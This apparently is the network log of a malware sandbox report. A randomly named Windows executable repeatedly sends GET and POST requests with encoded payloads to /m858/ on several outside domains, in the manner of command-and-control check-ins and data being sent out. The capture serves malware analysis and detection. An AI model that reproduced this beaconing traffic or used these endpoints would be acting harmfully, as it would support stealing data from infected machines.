Dec 7, 2023 13:42:53.053397894 CET | 451 | OUT | GET /m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:42:54.192111969 CET | 505 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6
                                                                                                                      content-length: 0
                                                                                                                      date: Thu, 07 Dec 2023 12:42:53 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49713 | 173.231.241.132 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:42:59.599157095 CET | 715 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=8Qr8FP/9SVmDArgE3TF78oVROuZ+SPK63z/K0E1xbMGxIF+mtz2I+9FC0NnVV9U4s0w/vNHCtu3krirBmkTuL1zkUfgVNLrNZD1+kLbvt9D1HyiGKcxH2PMyQ0wv6FMfjebSehAfYu/J4GzmC2N1FJrEYbHGUiTj7Q5KWDPV515ZUXmYHg==
Dec 7, 2023 13:43:02.403894901 CET | 418 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:42:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Dec 7, 2023 13:43:02.517198086 CET1286INData Raw: 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 36 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61
                                                                                                                      Data Ascii: e*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}</style><style id='wp-block-paragraph-inline-css'>.is-small-text
                                                                                                                      Dec 7, 2023 13:43:02.517218113 CET1286INData Raw: 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e
                                                                                                                      Data Ascii: h:100%}.wp-block-search__label{width:100%}.wp-block-search__input{-webkit-appearance:initial;appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block
                                                                                                                      Dec 7, 2023 13:43:02.517333031 CET1286INData Raw: 76 69 6f 72 2d 65 78 70 61 6e 64 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 73 65 61 72 63 68 66 69 65 6c 64 2d 68 69 64 64 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 7b 6f
                                                                                                                      Data Ascii: vior-expand.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-wi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49714 | 173.231.241.132 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe

Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:02.280976057 CET | 735 | OUT | POST /m858/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.porousworld.com
Origin: http://www.porousworld.com
Referer: http://www.porousworld.com/m858/
Content-Length: 206
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Data Ascii: nRRpS=8Qr8FP/9SVmDBLQE7Qt7o4VOS+Z+bvK+3zjK0Fw0bfixJgam8GCI99FCsdnMLNUFs08ZvN7CtujkrnXBmTvtKlz6c/gXDrrNZD1+kLO6t971EDSGL9xGp/MxZUwv+FMljebgejk5YtHJ4C3mCDt2LJrGcbGsV3q6uxlsASL3nBcQVCKLAbwdWJ3roXgLJKEtBKcDzcU=
Dec 7, 2023 13:43:05.393357038 CET | 381 | IN | HTTP/1.1 404 Not Found
Date: Thu, 07 Dec 2023 12:43:02 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49715 | 173.231.241.132 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe

Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:04.952063084 CET | 1748 | OUT | POST /m858/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.porousworld.com
Origin: http://www.porousworld.com
Referer: http://www.porousworld.com/m858/
Content-Length: 1218
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:43:06.392672062 CET | 418 | IN | HTTP/1.1 404 Not Found
Date: Thu, 07 Dec 2023 12:43:05 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49716 | 173.231.241.132 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:07.624785900 CET | 445 | OUT | GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvKlLpV/QRDbvCOg== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:43:11.453655958 CET | 486 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:07 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      X-Redirect-By: WordPress
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Location: http://porousworld.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvKlLpV/QRDbvCOg==
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
Dec 7, 2023 13:43:11.494385004 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49717 | 69.57.161.215 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:16.946492910 CET | 718 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=o1nBT8Q5DuvbYwmuqIiPR0cZLipFMwkRR8CpWjn3jfyg9DCPcF/mz7vZ6b3/WeqA9/xNIwqmO+iRU9ZRb7Tr4S3oUnVc5tsUzlRkheB3Uib4z5Evf6SOcu3TPb/76H2BMH6qagUXih/yHoyc5remPyvF4HvSWUQMwM+dudxDlJesyFKFZQ==
Dec 7, 2023 13:43:17.232382059 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:17 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49718 | 69.57.161.215 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:19.670157909 CET | 738 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=o1nBT8Q5DuvbZQ2upvOPXUcaSSpFZglaR8+pWiTngtWg9iyPTgTmw7vZ173+IuqL9/NrIxWmO+2RU8pRbNbq3i3qB3Vem9sUzlRkheUgUiD4zIUvfeGNAe3QZr/7+H2FMH6IakU9ijHyHpCc6+q5BCvD2nuQdm1886qmoN59lcz/3QmWeu8OE1H3MHmPdUB3Exb0bhA=
Dec 7, 2023 13:43:19.962165117 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49719 | 69.57.161.215 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:22.388601065 CET | 1751 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:43:22.690159082 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:22 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49720 | 69.57.161.215 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:25.108484030 CET | 446 | OUT | GET /m858/?nRRpS=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePzt1TzPXk8Fubw2qA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:43:25.401052952 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49721 | 194.58.112.174 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:31.189667940 CET | 718 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:43:31.470525026 CET | 1286 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Dec 2023 12:43:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49722 | 194.58.112.174 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:33.988975048 CET | 738 | OUT | POST /m858/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.lets-room.online
Origin: http://www.lets-room.online
Referer: http://www.lets-room.online/m858/
Content-Length: 206
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:43:34.270386934 CET | 1286 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Dec 2023 12:43:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49723 | 194.58.112.174 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:36.798561096 CET | 1751 | OUT | POST /m858/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.lets-room.online
Origin: http://www.lets-room.online
Referer: http://www.lets-room.online/m858/
Content-Length: 1218
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:43:37.077439070 CET | 1286 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Dec 2023 12:43:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49724 | 194.58.112.174 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:39.597889900 CET | 446 | OUT | GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=OT9XPYCRU0j98Hg/1uDBlXaBM2XXKmT/I6iFF8QONKz/+dd2eTQvqRBLoPpbyNuYQnsLqtRbnM1ZEfE8nLSuVudurqNICOu10w== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.lets-room.online
Connection: close
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:43:39.881903887 CET | 1286 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Dec 2023 12:43:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49725 | 217.144.107.2 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:43:57.230798960 CET | 703 | OUT | POST /m858/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.sorenad.com
Origin: http://www.sorenad.com
Referer: http://www.sorenad.com/m858/
Content-Length: 186
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=ML4JSSWlN2WHcMfXLnywMBseLKgnhsJX8xJGIsEmz35eY7zJWspXj8G7JRzA9zTBOC3fhB+ySFGv/PfIyF5bAdDY8OfcBIMp8J2VD/C1o7KJ5/295p9yAYq48cjgH4/8SdYvOx6c+k9+WEjx1Za/qkWzUyyyCUSQOV0QnZ2XQql4ioIb0Q==
Dec 7, 2023 13:43:58.069253922 CET | 1286 | IN | HTTP/1.1 404 Not Found
Connection: close
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
content-encoding: br
vary: Accept-Encoding
date: Thu, 07 Dec 2023 12:43:57 GMT
server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49726 | 217.144.107.2 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:44:00.078624964 CET | 723 | OUT | POST /m858/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.sorenad.com
Origin: http://www.sorenad.com
Referer: http://www.sorenad.com/m858/
Content-Length: 206
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: nRRpS=ML4JSSWlN2WHcsPXIEawLhsBXagnrMJb8xFGItQPzldefaDJE5dXk8G7RhzByTTOOC6qhASySFSv/LXIy2BaCNDa2efSf4Mp8J2VD/Gfo/uJ5OG9rI91eoq728jgWI+1SdYNO1il+mF+WGLx2N28kkW1JizhRR/cCyI8u7OEbvoVudkIzuBCRjuhFCZ0eICZCooflOo=
Dec 7, 2023 13:44:01.021805048 CET | 1286 | IN | HTTP/1.1 404 Not Found
Connection: close
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
content-encoding: br
vary: Accept-Encoding
date: Thu, 07 Dec 2023 12:44:00 GMT
server: LiteSpeed
                                                                                                                      Data Ascii: YhL Pv>`,>I:P*h-O8kK;\|<_rY46!lx#0,=.fc^8.v/t]R`/I]g>JXs4Z*odQ-2^/a59`Pvho`,qm?j`pI1v|I7ZOKWZ-JP
                                                                                                                      Dec 7, 2023 13:44:01.021852016 CET1286INData Raw: d7 28 a7 98 46 50 05 99 5b 85 99 db 9b 0d 14 4b 66 4a f6 34 6c 41 92 47 fa c5 56 de d1 72 39 fe 58 09 0c d5 53 ac cb f6 00 24 1b 5c 56 90 b1 55 8c b1 31 6c e4 2d c5 ed ee 2e b1 14 e6 2a 29 e3 d6 c1 00 7b 5d 5b fa 27 de e0 01 f0 f3 65 ab 0d 9d 43
                                                                                                                      Data Ascii: (FP[KfJ4lAGVr9XS$\VU1l-.*){]['eC{xP&:U44UBi8G73<VRUig~%iD|2)Z3'Se#}BHc=dyN*"-mG`1n:=i522-XmH(Cx&
                                                                                                                      Dec 7, 2023 13:44:01.021867990 CET964INData Raw: 4b e3 a5 bb 42 7f 64 ef 02 c5 91 4c a8 f7 34 75 dc 99 b9 02 e9 46 84 8f 0e 49 b3 92 cc 15 59 ea 4c d3 63 ec c3 3f 76 eb b3 7a d1 e0 8d ae 4d 2f 1b 1e 15 ad 9e 00 e6 bf 81 21 97 35 43 58 fc ef 78 d3 ab d1 0c 91 a2 22 98 0a 49 5d 0e bd 0f b7 28 90
                                                                                                                      Data Ascii: KBdL4uFIYLc?vzM/!5CXx"I](<PtKdLP$4H6),nP){-]~'%H.)rK0FnMa=_/p\X~LWg*9a}`^4-z4,WX+ +
                                                                                                                      Dec 7, 2023 13:44:01.021881104 CET6INData Raw: 31 0d 0a 03 0d 0a
                                                                                                                      Data Ascii: 1
